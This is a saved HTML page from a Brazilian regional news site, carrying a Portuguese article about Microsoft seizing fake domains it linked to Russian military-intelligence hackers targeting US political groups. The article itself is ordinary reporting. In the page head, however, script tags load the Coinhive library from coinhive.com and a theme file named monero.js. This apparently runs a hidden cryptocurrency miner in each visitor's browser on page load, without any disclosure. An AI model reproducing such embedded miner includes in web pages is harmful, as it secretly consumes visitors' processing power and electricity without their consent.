

<!DOCTYPE html>
<html class="no-js" lang="pt-BR" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>MICROSOFT DENUNCIA AÇÃO DE HACKERS RUSSOS - Oiguassu</title>

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

<!-- This site is optimized with the Yoast SEO plugin v7.9 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="MICROSOFT DENUNCIA AÇÃO DE HACKERS RUSSOS - Oiguassu" />
<meta property="og:description" content="Empresa diz que cibercriminosos ligados ao governo da Rússia teriam tentado agir para interferir nas eleições legislativas americanas de novembro. Kremlin nega as acusações Hackers..." />
<meta property="og:url" content="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/" />
<meta property="og:site_name" content="Oiguassu" />
<meta property="article:section" content="Internacional" />
<meta property="article:published_time" content="2018-08-22T08:02:36+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303.jpg" />
<meta property="og:image:width" content="700" />
<meta property="og:image:height" content="394" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="Empresa diz que cibercriminosos ligados ao governo da Rússia teriam tentado agir para interferir nas eleições legislativas americanas de novembro. Kremlin nega as acusações Hackers..." />
<meta name="twitter:title" content="MICROSOFT DENUNCIA AÇÃO DE HACKERS RUSSOS - Oiguassu" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303.jpg" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"http:\/\/oiguassu.com\/","sameAs":[],"@id":"http:\/\/oiguassu.com\/#organization","name":"Oiguassu","logo":""}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Oiguassu &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo; MICROSOFT DENUNCIA AÇÃO DE HACKERS RUSSOS" href="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='dashicons-css'  href='http://oiguassu.com/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.3.2' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.8'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel='shortlink' href='https://wp.me/pS5BS-2yN' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fmicrosoft-denuncia-acao-de-hackers-russos%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fmicrosoft-denuncia-acao-de-hackers-russos%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/amp/"><link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
</head>
<body class="post-template-default single single-post postid-9845 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="Oiguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2018/05/cropped-b632f59c-2a6b-406a-bb6b-bd0031fe147b.jpg" height="427" width="1280" alt="Oiguassu" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/com-faturamento-milionario-empresa-de-foz-inaugura-17a-unidade-no-sul-do-pais/" title="COM FATURAMENTO MILIONÁRIO, EMPRESA DE FOZ INAUGURA 17ª UNIDADE NO SUL DO PAÍS">
					<span class="ticker-item-date">agosto 22, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">COM FATURAMENTO MILIONÁRIO, EMPRESA DE FOZ INAUGURA 17ª UNIDADE NO SUL DO PAÍS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/medica-vira-re-por-morte-de-menina-de-tres-anos-em-hospital-de-foz-do-iguacu/" title="MÉDICA VIRA RÉ POR MORTE DE MENINA DE TRÊS ANOS EM HOSPITAL DE FOZ DO IGUAÇU">
					<span class="ticker-item-date">agosto 22, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">MÉDICA VIRA RÉ POR MORTE DE MENINA DE TRÊS ANOS EM HOSPITAL DE FOZ DO IGUAÇU</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/conheca-os-programas-de-governo-dos-candidatos-a-presidente/" title="CONHEÇA OS PROGRAMAS DE GOVERNO DOS CANDIDATOS A PRESIDENTE">
					<span class="ticker-item-date">agosto 22, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CONHEÇA OS PROGRAMAS DE GOVERNO DOS CANDIDATOS A PRESIDENTE</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/milhares-de-argentnos-protestam-para-pedir-retirada-de-imunidade-de-cristina-kirchner/" title="MILHARES DE ARGENTNOS PROTESTAM PARA PEDIR RETIRADA DE IMUNIDADE DE CRISTINA KIRCHNER">
					<span class="ticker-item-date">agosto 22, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">MILHARES DE ARGENTNOS PROTESTAM PARA PEDIR RETIRADA DE IMUNIDADE DE CRISTINA KIRCHNER</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/contador-da-econorte-deleta-propina-a-carlos-nasser-ex-assessor-da-casa-civil/" title="CONTADOR DA ECONORTE DELETA PROPINA A CARLOS NASSER, EX-ASSESSOR DA CASA CIVIL">
					<span class="ticker-item-date">agosto 22, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CONTADOR DA ECONORTE DELETA PROPINA A CARLOS NASSER, EX-ASSESSOR DA CASA CIVIL</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/internacional/" itemprop="url"><span itemprop="title">Internacional</span></a></span></nav>
<article id="post-9845" class="post-9845 post type-post status-publish format-standard has-post-thumbnail hentry category-internacional">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			MICROSOFT DENUNCIA AÇÃO DE HACKERS RUSSOS		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="700" height="394" src="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303.jpg 700w, http://oiguassu.com/wp-content/uploads/2018/08/38833859_303-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2018/08/38833859_303-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/08/38833859_303-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/08/38833859_303-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/08/38833859_303-120x67.jpg 120w" sizes="(max-width: 700px) 100vw, 700px" data-attachment-id="9846" data-permalink="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/38833859_303/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303.jpg" data-orig-size="700,394" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="38833859_303" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/08/38833859_303.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">agosto 22, 2018</span>
</p>
	<div class="entry-content clearfix">
		<!--CusAdsVi1--><h2 style="text-align: justify;">Empresa diz que cibercriminosos ligados ao governo da Rússia teriam tentado agir para interferir nas eleições legislativas americanas de novembro. Kremlin nega as acusações</h2>
<p style="text-align: justify;">Hackers associados ao governo da Rússia tentaram manipular portais de internet de grupos conservadores de direita nos Estados Unidos, alertou nesta terça-feira (21/08) a Microsoft. A denúncia sugere que os cibercriminosos estariam aumentando suas atividades nos EUA, com a aproximação de eleições legislativas no país, em novembro.</p>
<p style="text-align: justify;">Através de uma ação judicial, a Microsoft se apropriou de seis portais de internet falsos que estariam envolvidos nessas tentativas. Um destes imitava o website do Senado americano, informou Brad Smith, presidente da gigante da tecnologia, em seu blog, Ele afirmou que os hackers estariam ligados à inteligência militar russa, conhecida como GRU.</p>
<p style="text-align: justify;">A estratégia seria ludibriar os usuários que, ao tentarem acessar os portais de determinados grupos políticos, eram redirecionados para websites falsos, tendo suas senhas e outras informações roubadas pelos hackers.</p>
<p style="text-align: justify;">Smith disse ainda que um dos portais reproduzia o do grupo International Republican Institute, do qual fazem parte senadores republicanos como John McCain, crítico ao presidente russo Vladimir Putin. Outro website falso de aparência semelhante ao original imitava o domínio utilizado pelo Hudson Institute, que promove discussões sobre vários temas, inclusive de cibersegurança.</p>
<p style="text-align: justify;">&#8220;Nossa preocupação é que esta e outras tentativas representem ameaças de segurança para uma variedade crescente de grupos ligados aos dois partidos políticos americanos [majoritários] enquanto se aproximam as eleições de 2018&#8221;, disse Smith. Alguns especialistas afirmam que o objetivo seria atingir os críticos de Putin.</p>
<p style="text-align: justify;">&#8220;Essa é mais uma demonstração de que os russos não tentam apenas atacar os partidos. Eles planejam ataques que entendem ser em seu próprio interesse nacional&#8221;, disse Eric Rosenbach, diretor do projeto Defending Digital Democracy (&#8220;Em Defesa da Democracia Digital&#8221;) da Universidade de Harvard ao jornal americano The New York Times. &#8220;O objetivo é prejudicar e depreciar qualquer grupo que conteste o modo como Putin age em seu país e no mundo.&#8221;</p>
<p style="text-align: justify;">&#8220;Para que fique claro, não temos até o momento provas de que esses domínios foram utilizados em ataques bem sucedidos antes que a DCU [a unidade para crimes digitais da empresa] transferisse o controle destes e tampouco temos provas que indiquem a identidade dos alvos finais de qualquer um dos ataques planejados envolvendo esses domínios&#8221;, disse a empresa.</p>
<h2 style="text-align: justify;">Kremlin nega ter conhecimento</h2>
<p style="text-align: justify;">O Facebook afirmou no mês passado que removeu 32 páginas e perfis falsos em suas plataformas, numa tentativa de combater interferências externas nas eleições americanas.</p>
<p style="text-align: justify;">A denúncia da Microsoft ocorre em meio ao agravamento das tensões envolvendo as eleições americanas e supostas tentativas de interferência nas eleições nos EUA por parte de Moscou.</p>
<p style="text-align: justify;">Em julho, a Justiça americana indiciou 12 membros da inteligência russa acusados de terem invadido as redes de computadores do Partido Democrata e de sua candidata às eleições presidenciais em 2016, Hillary Clinton.</p>
<p style="text-align: justify;">O procurador especial Robert Mueller investiga a suposta interferência russa nas eleições de 2016 e um possível conluio da campanha republicana que elegeu o presidente Donald Trump. Tanto a Rússia quanto Trump negam as acusações.</p>
<p style="text-align: justify;">O Kremlin afirmou nesta terça-feira não ter conhecimento das denúncias. &#8220;Não sabemos de quais hackers estão falando&#8221;, disse o porta-voz do governo russo Dmitry Peskov. &#8220;De quem falam, exatamente? Não compreendemos quais são as provas e o fundamento para que eles cheguem a essas conclusões&#8221;, afirmou.</p>
<h6 style="text-align: right;">(Com DW)</h6>
<p><img class="aligncenter size-large" src="http://unifoz.edu.br/ProdutosIMG/5_1.jpg" width="800" height="756" /></p>

<div style="font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-9845" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/?share=twitter" rel="noopener noreferrer" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-9845" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/?share=facebook" rel="noopener noreferrer" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-9845" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/microsoft-denuncia-acao-de-hackers-russos/?share=google-plus-1" rel="noopener noreferrer" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "MICROSOFT DENUNCIA AÇÃO DE HACKERS RUSSOS"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/microsoft-denuncia-acao-de-hackers-russos/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='9845' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="4b52fc5910" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="120"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2018 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>
	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/microsoft-denuncia-acao-de-hackers-russos\/":9845};
	</script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201834'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Augaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.3.2'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201834.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.3.2',blog:'12891280',post:'9845',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '9845' ]);
</script>
</body>
</html>